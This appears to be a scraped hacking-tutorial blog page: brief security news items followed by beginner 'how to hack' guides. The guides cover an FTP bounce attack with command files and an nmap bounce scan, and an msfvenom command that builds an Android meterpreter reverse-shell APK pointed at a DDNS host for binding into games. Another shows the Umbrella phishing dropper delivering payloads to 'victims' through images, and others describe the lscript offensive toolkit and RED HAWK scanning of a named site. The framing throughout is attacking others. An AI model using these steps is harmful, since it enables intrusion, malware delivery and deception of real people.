Microsoft Says Its Systems Were Also Breached in Massive SolarWinds Hack

0

The massive state-sponsored espionage campaign that compromised software maker SolarWinds also targeted Microsoft, as the unfolding investigation into the hacking spree reveals the incident may have been far more wider in scope, sophistication, and impact than previously thought.
News of…

Original Link

This is an excerpt of the content from the original author who maintains all rights.

NSA Warns Of Russian Government-Backed Hackers Aiming At US Defense Sector Targets

0

The National Security Agency issued an alert Monday warning… [Full Article Here]

JP Morgan – $1B Fine – You Gotta Read This

0

I mean seriously… the rest of us have to play fair. They were allegedly running a racketeering operation?

Original post: https://shedly.com/5A4je

Social Media Site for Hackers?

0

How to Hack Internal Private Systems Using FTP Bounce Attack?

0

Hello hackers, so today we are going to learn how can we attack the internal ftp private servers for a public server which we have exploited earlier to get the login user credentials for FTP port using Brute force with Hydra. This method is known as FTP Bounce attack as we deploy packets which bounce through an intermediate public server to the private victim machine.

The motive

You are a user in at a foreign region with IP address F.F.F.F and want to retrieve cryptographic source code from crypto.com in US. The FTP server at crypto.com is set up so as to allow you the connection, but deny the access to the crypto sources because your source IP address is a non-US site [as the FTP server can determine your DNS server]. In any case, you cannot directly retrieve the source code from crypto.com’s server.

However, crypto.com allow ufred.edu to download crypto sources because ufred.edu is of US. It happens you know that incoming data for ufred.edu is a worldwide write-able directory, through which any anonymous user can drop files and read them back. Let us assume that the IP address for Crypto.com’s is C.C.C.C.

FTP Bounce secure connection

The attack

Now assuming you have an FTP server that does passive mode. Open an FTP connection to your own machine’s real IP address [not localhost] and log in. Change to a convenient directory that you have the write access to, and then do:

	quote "pasv"
	quote "stor foobar"

Take note of the address and port that are returned from the PASV command, F,F,F,F,X,X. This FTP session will now hang, so background it or flip to another window or something to proceed with the rest of this.

Construct a file containing FTP server commands. Let’s call this file”instrs". It will look like this:

	user ftp
	pass -anonymous@
	cwd /export-restricted-crypto
	type i
	port F,F,F,F,X,X
	retr crypto.tar.Z
	quit
	^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
	^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
	...

F,F,F,F,X,X is the same address and port that your own machine handed you on the first connection. The trash at the end is extra lines you create, each containing 250 NULLS and nothing else, enough to fill up about 60K of extra data.

Open an FTP connection to ufred.edu, log in anonymously, and cd to /incoming. Now type the following into this FTP session, which transfers a copy of your”instrs” file over and then tells ufred.edu’s FTP server to connect to crypto.com’s FTP server using your file as the commands:

	put instrs
	quote "port C,C,C,C,0,21"
	quote "retr instrs"

Crypto.tar.Z should now show up as”foobar” on your machine via your first FTP connection. If the connection to ufred.edu didn’t die by itself due to an apparently common server bug, clean up by deleting “instrs” and exciting. Otherwise, you’ll have to reconnect to finish.

FTP Bounce Port Scanning
You can use the nmap port scanner in Unix and Windows environments to perform an FTP bounce port scan, using the -P0 and -b flags in the following manner:

nmap -P0 -b username:password@ftp-server:port <target host>

shows an FTP bounce port scan being launched through the Internet-based 142.51.17.230 to scan an internal host at 192.168.0.5, a known address previously enumerated through DNS querying.

FTP bounce scanning with nmap

# nmap -P0 -b 142.51.17.230 192.168.0.5 -p21,22,23,25,80Starting nmap 3.45 ( www.insecure.org/nmap/ )

Interesting ports on (192.168.0.5):

Port State Service

21/tcp open ftp

22/tcp open ssh

23/tcp closed telnet

25/tcp closed smtp

80/tcp open http

Nmap run completed — 1 IP address (1 host up) scanned in 12 seconds

Note :
When performing any type of bounce port scan with nmap, you should specify the -P0 option. This will prevent an attacker from probing the target host to ascertain whether it is up.

FTP Bounce Exploit Payload Delivery

If you can upload a binary file containing a crafted buffer overflow string to an FTP server that in turn is vulnerable to bounce attack, you can then send that information to a specific service port (either on the local host or other addresses). This concept is shown in Figure 8-2.

 An illustration of the FTP payload bounce attack

 

FTP Bounce firewall block

For this type of attack to be effective, an attacker needs to authenticate and log into the FTP server, locate a writeable directory, and test to see if the server is susceptible to FTP bounce attack. Solaris 2.6 is an excellent example because in its default state it is vulnerable to FTP bounce and RPC service overflow attacks. Binary exploit data isn’t the only type of payload that can be bounced through a vulnerable FTP server: spammers have also sent an unsolicited email this way.

Other possibilities

Despite the fact that such third-party connections are one-way only, they can be used for all kinds of things. Similar methods can be used to post virtually untraceable mail and news, hammer on servers at various sites, fill up disks, try to hop firewalls, and generally be annoying and hard to track down at the same time. A little thought will bring the realisation of numerous other scary possibilities.

FTP Bounce Description

Connections launched this way come from source port 20, which some sites allow through their firewalls in an effort to deal with the “ftp-data” problem. For some purposes, this can be the next best thing to source-routed attacks and is likely to succeed where source routeing fails against packet filters. And it’s all made possible by the way the FTP protocol spec was written, allowing control connections to come from anywhere and data connections to go anywhere.

If you like this article kindly rate it and do share. if you have any queries please comment below and let us know how you felt about the article. To know how to find devices on the internet to hack into them read the article on How To Use Shodan For Finding Vulnerable Targets, Information Gathering & Hacking?

Thank you.

Any Android Can Be Hacked Over The Internet Using Metasploit Part : 1

0

Today we’ll create metasploit payload embedding into android application and use it over Internet!

First we’ve to get the DDNS (Dynamic DNS) address to get the meterpreter session on the internet; so go to NOIP Dynamic DNS service and create an account there then you have to configure the DDNS with your system

So for Linux distributions:

Once you have opened up your Terminal window you will need to login as the “root” user. You can become the root user from the command line by entering “sudo -s” followed by the root password on your machine.

  1. cd /usr/local/src/
  2. wget http://www.no-ip.com/client/linux/noip-duc-linux.tar.gz
  3. tar xf noip-duc-linux.tar.gz
  4. cd noip-2.1.9-1/
  5. make install

You will then be prompted to login with your No-IP.com account username and password.

If you get “make not found” or “missing gcc” then you do not have the gcc compiler tools on your machine. You will need to install these in order to proceed.

Hack Any Android Over Internet Using Metasploit Part : 1

To Configure the Client

As root again (or with sudo) issue the below command:

/usr/local/bin/noip2 -C

(dash capital C, this will create the default config file)

You will then be prompted for your username and password for No-IP, as well as which host-names you wish to update. Be careful, one of the questions is “Do you wish to update ALL hosts”. If answered incorrectly this could effect hostnames in your account that are pointing at other locations.

Now the client is installed and configured, you just need to launch it. Simply issue this final command to launch the client in the background:

/usr/local/bin/noip2

Read the README file in the no-ip-2.1.9 folder for instructions on how to make the client run at startup. This varies depending on what Linux distribution you are running.

After getting your DDNS (it’ll be like hostname.ddns.net) configured you’ve to create metasploit Payload.

Secondly we’ve to create a msf payload using msfvenom:
command :

msfvenome -p android/meterpreter/reverse_tcp LHOST=hostname.ddns.net LPORT=4444 R> payload.apk

So the payload will be created.

Thirdly we’ve to bind the Payload with any other APK files like games or any applications etc
for that we should decomplie APK to put the metasploit Hook inside there.
Let’s see this in second (Last) Part : 2

Do comment below your feedback on this article! Thank You!

How to Hack Using Umbrella Dropper!? A Phishing Tool

0

Hello, hackers, Today we are going to know about Umbrella Dropper, which is dedicated to most pen-testing, it downloads files on the target system and executes them without a double execution of .exe, only of embed.

I know most of you might want to hack victims only by sending a real file, which when opened open ups a malicious link which automatically downloads the payload from a remote server and executed it without the need of double execution of .exe file which has been downloaded. even you can hack a victim by simply embedding a malicious backdoor as a zip file with the image and sending it to the victim to read on it follow the article on How To Hack Any Windows 7/8/10 Remotely Using An Image

Well, there are a lot of tools for that and thanks to Github to be an open source for developers and testers for sharing source code and files. Git Hub has been the heaven for penetration testers and n00bies for getting cool and perilous stuff to generate a various payload, scanners and injectors,etc….

Features

  • Download executable on the target system.
  • Silent execution.
  • Download and execute executable once time.
  • If the exe already had downloaded and running, open only pdf/docx/xxls/jpg/png.
  • Some Phishing methods are included.
  • Multiple Session disabled.
  • Bypass UAC.

Needed dependencies

  • apt
  • wine
  • wget
  • Linux
  • sudo access
  • python2.7
  • python 2.7 on Wine Machine

Installation of Umbrella:

  • first, we need to clone[download] the GitHub repository by the command “git clone https://github.com/4w4k3/Umbrella.git
  • Now change your directory to the downloaded folder “cd Umbrella
  • Obtain the permission for the installer file using the command “chmod +x install.sh
  • Run the installer using “./install.sh”. this will attempt to install all the requires dependencies needed for the program to run and update your system

umbrella dropper files

  • To run the script we use “Python.py”, since the script is a python script we first notify terminal that we are running a python script using the term python, we can also run using “./” which means executable file for Linux operating system

umbrella dropper python installation

  • During the installation you will be prompted with wine installation pop-up, we just need to specify Windows 7 or XP which will attempt to install windows .net framework to create an executable file. Next, it will ask you to install Python choose repair option to make necessary changes to the python libraries.

umbrella dropper error

Note: If you face any problems with installation or any error in Python the simply type in “python -m pip install –upgrade pip” this will attempt to upgrade all the python modules and debugs the installation automatically.

Using Umbrella Dropper:

After the installation you will be greeted with the umbrella interface where you will have four options saying:

umbrella dropper interface

  1. [D] GEN DROPPER
  2. [H] HELP
  3. [U] UPDATE
  4. [E] EXIT

umbrella dropper payload options

To generate payload type in D

This time you need to specify the file type you wish to use for the exploit. Next, you need to specify the URL for the .exe file.

Suppose you are running Apache locally then place the malicious payload [say payload.exe] generated from various payload generating tools in your ‘/var/www/html/” directory and the URL would be your local “IPaddress/payload.exe”.To know your local ip type in “ifconfig” in can terminal. If you are conducting a hack on the WAN then you need to upload the malicious file to any open web server accessible through the world wide web publically. but for this tutorial am using my local web server as shown in the screenshot:

umbrella dropper payload URL

When it asks for the URL then enter the URL for the payload on the server, but remember to check if the victim can access it or not. if the victim cant then its complete waste of time. Now it will ask to enter the image URL as a transporter as seen below I have given the URL in the screenshot:

umbrella dropper transport URL

This will produce a file in the “dist/” directory of the umbrella folder. send this to the victim when he opens the image the payload gets automatically executed. But if you think as a hacker, we can take advantage of the feature as When the victim opens the files the web browser opens the embedded link and since our link contains a payload it will be downloaded and automatically executed without the double execution of the payload and we will get a meterpreter session in our terminal. If we can select a favourite image regarding the victim likes by social engineering him as if, an example of a hacker, we can embed a payload to an image which can be selected to be kept as a background image and upload it to a file sharing server we can also create an album regarding the selection of the background image and infect all the image of the album and send the link to the victim to take a look on the album and if the victim suppose to like an image and download’s it then our job is done. now umbrella will do its magic and present us with a meterpreter shell.

But as mentioned to be a hacker you need not hack rather than thinking like a hacker, finally it’s all up to you to develop ideas regarding techniques of hacking a victim. If you like this article kindly rate it above and share it. If you have any queries then comment below to let us know how, to know how to hack Kali Linux then read the article on How To Hack The Hacker’s OS Kali Linux. Thank you.

How To Hack Anything Using All-In-One lscript Tool ? : Step-By-Step Guide

0

Hello hackers, Hope you guys are doing well. so today’s tutorial is for our n00bies and to all those hackers who want to get all tools into a single tools making them type less. This “lscript” tool is a script written by Aris Melachroinos, which allows you to automate penetration testing or hacking easily. It installs all the best tools available until 2017 for Kali Linux.

FEATURES: Custom keyboard shortcuts, launch any tool within lscript
Enabling-Disabling interfaces faster
Changing Mac faster
Anonymizing yourself faster
View your public IP faster
View your MAC faster
**TOOLS**
	(This installer installs every tool you need automatically! (except Zatacker))
	Fluxion				by Deltaxflux
	WifiTe				by derv82
	Wifiphisher			by Dan McInerney
	Zatacker			by ???
	Morpheus			by Pedro ubuntu  [ r00t-3xp10it ]
	Osrframework			by i3visio
	Hakku				by 4shadoww
	Trity				by Toxic-ig
	Cupp				by Muris Kurgas
	Dracnmap			by Edo -maland-
	Fern Wifi Cracker		by Savio-code
	Kichthemout			by Nikolaos Kamarinakis & David Schütz
	BeeLogger			by Alisson Moretto - 4w4k3
	Ghost-Phisher			by Savio-code
	Mdk3-master                     by Musket Developer
	Anonsurf                        by Und3rf10w
	The Eye                         by EgeBalci
	Airgeddon                       by v1s1t0r1sh3r3
	Xerxes                          by zanyarjamal
	Ezsploit                        by rand0m1ze
	Katana framework                by PowerScript
	4nonimizer                      by Hackplayers
	Sslstrip2                       by LeonardoNve
	Dns2proxy                       by LeonardoNve
	Pupy                            by n1nj4sec
	Zirikatu                        by pasahitz
	TheFatRat                       by Sceetsec
	Angry IP Scanner                by Anton Keks
	Sniper                          by 1N3
	ReconDog                        by UltimateHackers
	RED HAWK                        by Tuhinshubhra
**Wifi password scripts**
	Handshake       (WPA-WPA2)
	Find WPS pin    (WPA-WPA2)
	WEP hacking     (WEP)

How to Install lscript ?

This tool is available on Github and follow the simple step to install it

  1. Open up a terminal and navigate to your working directory
  2. Type in the following command "git clone https://github.com/arismelachroinos/lscript.git" this will attempt to clone the github repository into a single folder named lscript
  3. Now change your directory to the cloned folder from github using this command "cd lscript”
  4. Type in “ls” to know the files present in the working directory, but first, we need to get the permissions to execute the setup file, to do this type “chmod +x install.sh”lscript installation
  5. Type “./install.sh” to start your installation process. This will attempt to download all the required dependencies and tool from Github

How to use lscrpit ?

  1. Open another terminal and type in “l“, this will start the lazy script.
  2. Now you will be displayed with option for
  • ifconfig
  • Enabling/Disabling Wi-Fi and Monitor mode on wifi
  • Changing/Restoring MAC
  • Starting/disabling Anonymous surf
  • checking the anonymous status
  • view your public IP Address
  • View your MAC ID
  • Tools available with in the script (downloaded/required to be downloaded)
  • Handshakes captured
  • Find WPS pin
  • WEP Hacking
  • MITM attack
  • Metasploit
  • E-Mail Spoofing … as shown in the screenshot:

How To Hack Anything Using All-In-One lscript Tool ? : Step-By-Step Guide

 

to check for tools type in “9“, it will list available options for Tools as shown in the following screenshot, we can see that we have options for

  • Wi-Fi tools
  • Remote Access
  • Information Gathering
  • Installing /Re installing tool

lscript tool menu

to list all the available tools which we can install move into Installing tools, this will list all the tools available to us as described above and is shown in the following screenshot.

lscript tools script

to list the tools present for us in remote access  we check in to remote access and could find the most useful tools for creating payloads to exploit victim as seen in the screenshot:

for wifi hacking, we have many tools as we can see to be listed in the screenshot:

lscript wifi tools description

so without wasting your time install this tools, to save you time from typing and being lazy, hope you would like this article, and please comment below if you have any queries regarding the tool or any other topic and do share so that your hacker group can come to know about this awesome tools available publicly on the internet. If you wish to know how to hack Kali Linux read this article How To Hack The Hacker’s OS Kali Linux  and if you want to hack your friend with in network then follow the article on How To Hack With Xerosploit

Thank you.

RED HAWK: Multiple Scanning And Attack Vector

0

Hello friends, so today we are going to know about a tool RED HAWK, which can be used to gather some information regarding a target and determine some crucial information regarding the hosting information of the company, location, protocols used etc…… these come under Information gathering. It is the most crucial part for any hacker or pentester to perform a hack or simulate a hack. Information gathering mainly consist of

  • Network architecture
  • Connected devices
  • Open ports
  • Running services
  • Known vulnerabilities
  • Password profiling,etc……

There are many information gathering tools available over GitHub and over the internet out of that many ones is RED HAWK

RED HAWK is one of Best Information gathering tool written in PHP.it’s an all in one tool capable of gathering like Information Gathering (using WHOIS lookup, WordPress, Reverse IP Scanner etc.), SQL Vulnerability Scanning and Crawling.

to know more about information gathering visit this page Information Gathering

Features Of The Tool:

  • Server detection
  • CloudFlare detector
  • robots scanner
  • CMS Detector
  • WordPress
  • Joomla
  • Drupal
  • Magento
  • Whois
  • GEO-IP Scan
  • NMAP Port Scan
  • DNS Lookup
  • SubNet Calculator
  • Subdomain Finder
  • Reverse IP Scanner
  • CMS detection For Sites On the same server.
  • Parameter Finder
  • Error based SQLi Detector
  • Crawler
  • Basic Crawler {69}
  • [ – ] Admin scanner
  • [ – ] Backups Finder
  • [ – ] Misc. Crawler
  • Advance Crawler{420}
  • [ – ] Admin scanner
  • [ – ] Backups Finder
  • [ – ] Misc. Crawler

To access RED HAWK we need to clone it from Github or download the zip file from GitHub

The Installation:

  1. Open up a terminal and type in “git clone https://github.com/Tuhinshubhra/RED_HAWK.git

This will attempt to clone the git repository and will place all the files in the repository into a directory named RED_HAWK of you working directory.

If you have downloaded zip then just extract it and open a terminal in the extracted folder

  1. Now change you directly to the RED_HAWK folder using the command “cd RED_HAWK
  2. We can list the available files in the folder using the ‘ls’ command. To run the RED HAWK type in “php rhawk.php”.
  3. You will get the RED HAWK interface. Type “help” to list the available options for us NOTE: if you face any error in the run the tool then type “fix” this will Install All Required Modules.Fix content
  4. Type in the domain name you want to scan (without Http:// OR Https://).for example we are setting facebook.com  as a target.
  5. Select whether The Site Runs On HTTPS or not. If it does it is preferred to select HTTPS for better scanning and results.

NOTE: if Scanner Stops Working After CloudFlare Detection! Use The fix Command OR Manually Install php-curl & php-xml

as seen in the below screenshot it does a nmap scan to identify services on ports and find open ports to gather information related to the operating system running, Firewall, Traceroute etc… to know more about nmap scan, please read this article All Nmap tool commands at your fingertips!

it also does a DNS scan related to our target to determine for DNS vulnerabilities and display the subnet available for the target we selected, as we can see that we get information regarding that Facebook usesIPv6 protocol

this tool also determines the geographical location of our target similar to the results of shodan, to know about shodan read this article on How To Use Shodan For Finding Vulnerable Targets, Information Gathering & Hacking?

as mentioned this tool does more than we can imagine. this tool does our work more easy by automating all the required tasks of Information gathering, taking each and every single point of interest regarding our target.

hope you had enjoyed reading this article if you did kindly share to let your hacker friend(s) know that there is a tool which can let his/her work of information gathering more simple and easy giving him/her a plenty of time to plan the attack. If you have any queries regarding the article then do comment below and let us know how you felt reading the article. Thank You.